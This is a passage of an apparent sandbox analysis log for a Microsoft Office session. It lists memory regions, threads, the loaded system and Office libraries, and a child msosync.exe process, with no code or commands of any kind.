office\\office16\\proof\\mssp7en.lex") Region: id = 2007 start_va = 0x7ffb33830000 end_va = 0x7ffb338c5fff monitored = 0 entry_point = 0x7ffb3384282c region_type = mapped_file name = "mscss7en.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\mscss7en.dll" (normalized: "c:\\program files\\microsoft office\\office16\\mscss7en.dll") Region: id = 2008 start_va = 0x1912cb00000 end_va = 0x1912cb00fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "excludedictionaryen0409.lex" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\UProof\\ExcludeDictionaryEN0409.lex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\uproof\\excludedictionaryen0409.lex") Region: id = 2009 start_va = 0x7ffb33790000 end_va = 0x7ffb33829fff monitored = 0 entry_point = 0x7ffb337a4d8c region_type = mapped_file name = "css7data0009.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\CSS7DATA0009.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\css7data0009.dll") Region: id = 2011 start_va = 0x19139050000 end_va = 0x191391d7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files\\Microsoft Office\\Office16\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files\\microsoft office\\office16\\proof\\mssp7en.lex") Region: id = 2012 start_va = 0x191391e0000 end_va = 0x1913973bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "nl7models0009.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\NL7MODELS0009.dll" (normalized: "c:\\program files\\microsoft office\\office16\\nl7models0009.dll") Region: id = 2013 start_va = 0x1912cb00000 end_va = 0x1912cb02fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mscss7cm_en.dub" filename = "\\Program Files\\Microsoft Office\\Office16\\mscss7cm_en.dub" (normalized: "c:\\program files\\microsoft office\\office16\\mscss7cm_en.dub") Region: id = 2014 start_va = 0x1912cb10000 end_va = 0x1912cb2afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mscss7wre_en.dub" filename = "\\Program Files\\Microsoft Office\\Office16\\mscss7wre_en.dub" (normalized: "c:\\program files\\microsoft office\\office16\\mscss7wre_en.dub") Region: id = 2015 start_va = 0x1912cb30000 end_va = 0x1912cb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb30000" filename = "" Region: id = 2016 start_va = 0x1912cb40000 end_va = 0x1912cb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb40000" filename = "" Region: id = 2017 start_va = 0x1912cb50000 end_va = 0x1912cb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb50000" filename = "" Region: id = 2018 start_va = 0x1912cb60000 end_va = 0x1912cb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb60000" filename = "" Region: id = 2019 start_va = 0x1912cb50000 end_va = 0x1912cb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb50000" filename = "" Region: id = 2020 start_va = 0x1912cb60000 end_va = 0x1912cb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb60000" filename = "" Region: id = 2021 start_va = 0x1912cb70000 end_va = 0x1912cb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb70000" filename = "" Region: id = 2022 start_va = 0x19139740000 end_va = 0x19139f41fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msgr8en.lex" filename = "\\Program Files\\Microsoft Office\\Office16\\PROOF\\MSGR8EN.LEX" (normalized: "c:\\program files\\microsoft office\\office16\\proof\\msgr8en.lex") Region: id = 2023 start_va = 0x1912cb50000 end_va = 0x1912cb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msgr8en.dub" filename = "\\Program Files\\Microsoft Office\\Office16\\PROOF\\msgr8en.dub" (normalized: "c:\\program files\\microsoft office\\office16\\proof\\msgr8en.dub") Region: id = 2025 start_va = 0x19139f50000 end_va = 0x1913af1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019139f50000" filename = "" Region: id = 2046 start_va = 0x19138e70000 end_va = 0x19138f3cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 2047 start_va = 0x1912cb60000 end_va = 0x1912cb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb60000" filename = "" Region: id = 2048 start_va = 0x1912cb70000 end_va = 0x1912cb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb70000" filename = "" Region: id = 2049 start_va = 0x1912cb80000 end_va = 0x1912cb8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb80000" filename = "" Region: id = 2050 start_va = 0x1913af20000 end_va = 0x1913beeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001913af20000" filename = "" Region: id = 2052 start_va = 0x1912cb70000 end_va = 0x1912cb71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb70000" filename = "" Region: id = 2053 start_va = 0x1912cb80000 end_va = 0x1912cb80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb80000" filename = "" Region: id = 2062 start_va = 0x1912cb70000 end_va = 0x1912cb70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cb70000" filename = "" Region: id = 2063 start_va = 0x1912cb80000 end_va = 0x1912cb93fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cb80000" filename = "" Region: id = 2064 start_va = 0x1912cba0000 end_va = 0x1912cbb3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cba0000" filename = "" Region: id = 2065 start_va = 0x1912cb70000 end_va = 0x1912cb71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb70000" filename = "" Region: id = 2066 start_va = 0x1912cbc0000 end_va = 0x1912cbc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cbc0000" filename = "" Region: id = 2067 start_va = 0x1912cbd0000 end_va = 0x1912cbd1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cbd0000" filename = "" Region: id = 2068 start_va = 0x1912cbe0000 end_va = 0x1912cbe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cbe0000" filename = "" Region: id = 2076 start_va = 0x1912cb80000 end_va = 0x1912cb81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb80000" filename = "" Region: id = 2077 start_va = 0x1912cb90000 end_va = 0x1912cb90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb90000" filename = "" Region: id = 2079 start_va = 0x7ffb451e0000 end_va = 0x7ffb45341fff monitored = 0 entry_point = 0x7ffb45231b30 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll") Region: id = 2086 start_va = 0x1912cb80000 end_va = 0x1912cb81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cb80000" filename = "" Region: id = 2087 start_va = 0x1912cb90000 end_va = 0x1912cb92fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb90000" filename = "" Region: id = 2088 start_va = 0x1912cbd0000 end_va = 0x1912cbd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cbd0000" filename = "" Region: id = 2245 start_va = 0x5465e00000 end_va = 0x5465efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005465e00000" filename = "" Region: id = 2247 start_va = 0x5465f00000 end_va = 0x5465ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005465f00000" filename = "" Region: id = 2250 start_va = 0x1912cb90000 end_va = 0x1912cb90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cb90000" filename = "" Region: id = 2251 start_va = 0x1912cbd0000 end_va = 0x1912cbe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cbd0000" filename = "" Region: id = 2256 start_va = 0x1912cb90000 end_va = 0x1912cb91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb90000" filename = "" Region: id = 2257 start_va = 0x1912cbf0000 end_va = 0x1912cbf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cbf0000" filename = "" Region: id = 2265 start_va = 0x1912cbd0000 end_va = 0x1912cbe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cbd0000" filename = "" Region: id = 2266 start_va = 0x19137220000 end_va = 0x19137711fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019137220000" filename = "" Region: id = 2267 start_va = 0x1912cb90000 end_va = 0x1912cb92fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb90000" filename = "" Region: id = 2268 start_va = 0x1912cbd0000 end_va = 0x1912cbd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cbd0000" filename = "" Region: id = 2270 start_va = 0x1912cbd0000 end_va = 0x1912cbe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cbd0000" filename = "" Region: id = 2271 start_va = 0x1912cb90000 end_va = 0x1912cb91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb90000" filename = "" Region: id = 2272 start_va = 0x1912cbf0000 end_va = 0x1912cbf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cbf0000" filename = "" Region: id = 2273 start_va = 0x1912cb90000 end_va = 0x1912cb92fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb90000" filename = "" Region: id = 2274 start_va = 0x1912cbf0000 end_va = 0x1912cbf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cbf0000" filename = "" Region: id = 2276 start_va = 0x5466000000 end_va = 0x54660fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005466000000" filename = "" Region: id = 2277 start_va = 0x1912cb90000 end_va = 0x1912cb91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb90000" filename = "" Region: id = 2278 start_va = 0x1912cbd0000 end_va = 0x1912cbd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cbd0000" filename = "" Region: id = 2282 start_va = 0x1912cb90000 end_va = 0x1912cb92fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb90000" filename = "" Region: id = 2284 start_va = 0x1912cb90000 end_va = 0x1912cb91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb90000" filename = "" Region: id = 2285 start_va = 0x1912cbd0000 end_va = 0x1912cbe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cbd0000" filename = "" Region: id = 2286 start_va = 0x1912cbf0000 end_va = 0x1912cbf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cbf0000" filename = "" Region: id = 2300 start_va = 0x1912cb90000 end_va = 0x1912cb91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb90000" filename = "" Region: id = 2301 start_va = 0x1912cbd0000 end_va = 0x1912cbd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cbd0000" filename = "" Region: id = 2571 start_va = 0x1912cbd0000 end_va = 0x1912cbf5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "alrtintl.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\alrtintl.dll") Region: id = 2572 start_va = 0x1912cb80000 end_va = 0x1912cbb1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb80000" filename = "" Region: id = 2573 start_va = 0x1912cbd0000 end_va = 0x1912cbd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cbd0000" filename = "" Region: id = 2574 start_va = 0x1913bef0000 end_va = 0x1913bff0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001913bef0000" filename = "" Region: id = 2575 start_va = 0x1913bef0000 end_va = 0x1913bff0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001913bef0000" filename = "" Region: id = 2576 start_va = 0x1912cbd0000 end_va = 0x1912cbd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cbd0000" filename = "" Region: id = 2577 start_va = 0x1913bef0000 end_va = 0x1913bff0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001913bef0000" filename = "" Region: id = 2578 start_va = 0x1913bef0000 end_va = 0x1913bff0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001913bef0000" filename = "" Region: id = 2579 start_va = 0x1912cbd0000 end_va = 0x1912cbd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cbd0000" filename = "" Region: id = 2580 start_va = 0x1912cbd0000 end_va = 0x1912cbd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cbd0000" filename = "" Region: id = 2581 start_va = 0x1913bef0000 end_va = 0x1913bff0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001913bef0000" filename = "" Region: id = 2582 start_va = 0x1913bef0000 end_va = 0x1913bff0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001913bef0000" filename = "" Region: id = 2583 start_va = 0x1912cbd0000 end_va = 0x1912cbd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cbd0000" filename = "" Region: id = 2584 start_va = 0x1913bef0000 end_va = 0x1913bff0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001913bef0000" filename = "" Region: id = 2585 start_va = 0x1913bef0000 end_va = 0x1913bff0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001913bef0000" filename = "" Region: id = 2586 start_va = 0x1912cbd0000 end_va = 0x1912cbd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cbd0000" filename = "" Region: id = 2587 start_va = 0x5466100000 end_va = 0x54661fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005466100000" filename = "" Region: id = 2588 start_va = 0x7ff711920000 end_va = 0x7ff71192ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff711920000" filename = "" Region: id = 2589 start_va = 0x1912cbd0000 end_va = 0x1912cbdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cbd0000" filename = "" Region: id = 2590 start_va = 0x1912cae0000 end_va = 0x1912caeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cae0000" filename = "" Region: id = 2591 start_va = 0x1912cac0000 end_va = 0x1912cacffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cac0000" filename = "" Region: id = 2592 start_va = 0x1912cac0000 end_va = 0x1912cac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cac0000" filename = "" Region: id = 2593 start_va = 0x1912cac0000 end_va = 0x1912cacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cac0000" filename = "" Region: id = 2594 start_va = 0x1912cad0000 end_va = 0x1912cadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cad0000" filename = "" Region: id = 2595 start_va = 0x1912cae0000 end_va = 0x1912caeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cae0000" filename = "" Region: id = 2596 start_va = 0x1912cad0000 end_va = 0x1912cad0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cad0000" filename = "" Region: id = 2597 start_va = 0x19137720000 end_va = 0x19137820fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019137720000" filename = "" Region: id = 2598 start_va = 0x19137720000 end_va = 0x19137820fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019137720000" filename = "" Region: id = 2599 start_va = 0x1912cad0000 end_va = 0x1912cad0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cad0000" filename = "" Region: id = 2600 start_va = 0x19137720000 end_va = 0x19137820fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019137720000" filename = "" Region: id = 2601 start_va = 0x19137720000 end_va = 0x19137820fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019137720000" filename = "" Region: id = 2602 start_va = 0x1912cad0000 end_va = 0x1912cad0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cad0000" filename = "" Region: id = 2603 start_va = 0x1913bef0000 end_va = 0x1913ceeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001913bef0000" filename = "" Region: id = 2604 start_va = 0x19137720000 end_va = 0x1913779ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~wrl0002.tmper.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\~WRL0002.tmper.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\~wrl0002.tmper.doc") Region: id = 2605 start_va = 0x19137720000 end_va = 0x1913779ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "purchase ord" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\Purchase Ord" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\purchase ord") Region: id = 2606 start_va = 0x1912cad0000 end_va = 0x1912cad0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cad0000" filename = "" Region: id = 2607 start_va = 0x1912c880000 end_va = 0x1912c88ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912c880000" filename = "" Region: id = 2608 start_va = 0x19137220000 end_va = 0x19137711fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019137220000" filename = "" Thread: id = 1 os_tid = 0x1254 Thread: id = 2 os_tid = 0x1230 Thread: id = 3 os_tid = 0x1234 Thread: id = 4 os_tid = 0x1270 Thread: id = 5 os_tid = 0x1278 Thread: id = 6 os_tid = 0x12a0 Thread: id = 7 os_tid = 0x1288 Thread: id = 8 os_tid = 0x1284 Thread: id = 9 os_tid = 0x1274 Thread: id = 10 os_tid = 0x1238 Thread: id = 11 os_tid = 0x1290 Thread: id = 12 os_tid = 0x112c Thread: id = 13 os_tid = 0x1330 Thread: id = 14 os_tid = 0x1308 Thread: id = 15 os_tid = 0x1304 Thread: id = 16 os_tid = 0x12f4 Thread: id = 17 os_tid = 0x1390 Thread: id = 18 os_tid = 0x11d8 Thread: id = 19 os_tid = 0x12e0 Thread: id = 20 os_tid = 0x1394 Thread: id = 21 os_tid = 0x13a8 Thread: id = 22 os_tid = 0x1128 Thread: id = 24 os_tid = 0x13b8 Thread: id = 25 os_tid = 0x139c Thread: id = 54 os_tid = 0x6a4 Thread: id = 155 os_tid = 0xe80 Thread: id = 186 os_tid = 0xf28 Thread: id = 187 os_tid = 0xf3c Thread: id = 190 os_tid = 0xfa4 Thread: id = 212 os_tid = 0x8b0 Process: id = "2" image_name = "msosync.exe" filename = "c:\\program files\\microsoft office\\office16\\msosync.exe" page_root = "0x2f013000" os_pid = "0x1154" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x1314" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office16\\MsoSync.exe\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Documents\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fc8c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 634 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 635 start_va = 0x22634a0000 end_va = 0x226359ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000022634a0000" filename = "" Region: id = 636 start_va = 0x2263600000 end_va = 0x22637fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002263600000" filename = "" Region: id = 637 start_va = 0x141b94d0000 end_va = 0x141b94effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141b94d0000" filename = "" Region: id = 638 start_va = 0x141b94f0000 end_va = 0x141b9504fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141b94f0000" filename = "" Region: id = 639 start_va = 0x141b9510000 end_va = 0x141b9513fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141b9510000" filename = "" Region: id = 640 start_va = 0x141b9520000 end_va = 0x141b9521fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141b9520000" filename = "" Region: id = 641 start_va = 0x7ff6c55d0000 end_va = 0x7ff6c55f2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c55d0000" filename = "" Region: id = 642 start_va = 0x7ff6c5bd0000 end_va = 0x7ff6c5c48fff monitored = 0 entry_point = 0x7ff6c5bd968c region_type = mapped_file name = "msosync.exe" filename = "\\Program Files\\Microsoft Office\\Office16\\MSOSYNC.EXE" (normalized: "c:\\program files\\microsoft office\\office16\\msosync.exe") Region: id = 643 start_va = 0x7ffb56e50000 end_va = 0x7ffb57010fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 658 start_va = 0x141b94d0000 end_va = 0x141b94dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141b94d0000" filename = "" Region: id = 659 start_va = 0x141b9530000 end_va = 0x141b95edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 660 start_va = 0x141b9630000 end_va = 0x141b972ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141b9630000" filename = "" Region: id = 661 start_va = 0x7ff6c54d0000 end_va = 0x7ff6c55cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c54d0000" filename = "" Region: id = 662 start_va = 0x7ffb53b70000 end_va = 0x7ffb53d57fff monitored = 0 entry_point = 0x7ffb53b9ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 663 start_va = 0x7ffb55050000 end_va = 0x7ffb550fcfff monitored = 0 entry_point = 0x7ffb550681a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 664 start_va = 0x7ffb51d50000 end_va = 0x7ffb51dc8fff monitored = 0 entry_point = 0x7ffb51d6fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 665 start_va = 0x7ff6c5450000 end_va = 0x7ff6c54cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Region: id = 683 start_va = 0x2263800000 end_va = 0x22638fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000002263800000" filename = "" Region: id = 684 start_va = 0x141b94e0000 end_va = 0x141b94e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141b94e0000" filename = "" Region: id = 685 start_va = 0x7ffb54fa0000 end_va = 0x7ffb55046fff monitored = 0 entry_point = 0x7ffb54fb58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 686 start_va = 0x7ffb54840000 end_va = 0x7ffb548dcfff monitored = 0 entry_point = 0x7ffb548478a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 687 start_va = 0x7ffb55100000 end_va = 0x7ffb5515afff monitored = 0 entry_point = 0x7ffb551138b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 688 start_va = 0x7ffb55160000 end_va = 0x7ffb5527bfff monitored = 0 entry_point = 0x7ffb551a02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 689 start_va = 0x7ffb548e0000 end_va = 0x7ffb54a65fff monitored = 0 entry_point = 0x7ffb5492ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 690 start_va = 0x7ffb54680000 end_va = 0x7ffb547d5fff monitored = 0 entry_point = 0x7ffb5468a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 691 start_va = 0x7ffb54e50000 end_va = 0x7ffb54f92fff monitored = 0 entry_point = 0x7ffb54e78210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 692 start_va = 0x7ffb543d0000 end_va = 0x7ffb5464cfff monitored = 0 entry_point = 0x7ffb544a4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 693 start_va = 0x7ffb540d0000 end_va = 0x7ffb54139fff monitored = 0 entry_point = 0x7ffb54106d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 709 start_va = 0x7ffb46b70000 end_va = 0x7ffb46b88fff monitored = 0 entry_point = 0x7ffb46b7ee50 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 710 start_va = 0x7ffb52610000 end_va = 0x7ffb52703fff monitored = 0 entry_point = 0x7ffb5261a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 711 start_va = 0x141b9730000 end_va = 0x141b981ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141b9730000" filename = "" Region: id = 712 start_va = 0x141b95f0000 end_va = 0x141b95f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141b95f0000" filename = "" Region: id = 713 start_va = 0x141b9730000 end_va = 0x141b9768fff monitored = 0 entry_point = 0x141b97312f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 714 start_va = 0x141b9810000 end_va = 0x141b981ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141b9810000" filename = "" Region: id = 715 start_va = 0x141b9820000 end_va = 0x141b99a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141b9820000" filename = "" Region: id = 716 start_va = 0x7ffb56da0000 end_va = 0x7ffb56ddafff monitored = 0 entry_point = 0x7ffb56da12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 717 start_va = 0x141b99b0000 end_va = 0x141b9b30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141b99b0000" filename = "" Region: id = 718 start_va = 0x141b9b40000 end_va = 0x141baf3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000141b9b40000" filename = "" Region: id = 719 start_va = 0x141b9600000 end_va = 0x141b9600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141b9600000" filename = "" Region: id = 720 start_va = 0x141b9610000 end_va = 0x141b9610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141b9610000" filename = "" Region: id = 721 start_va = 0x141b9730000 end_va = 0x141b97effff monitored = 0 entry_point = 0x141b9750da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 722 start_va = 0x141b9620000 end_va = 0x141b9620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141b9620000" filename = "" Region: id = 723 start_va = 0x141b9730000 end_va = 0x141b9730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000141b9730000" filename = "" Region: id = 724 start_va = 0x141baf40000 end_va = 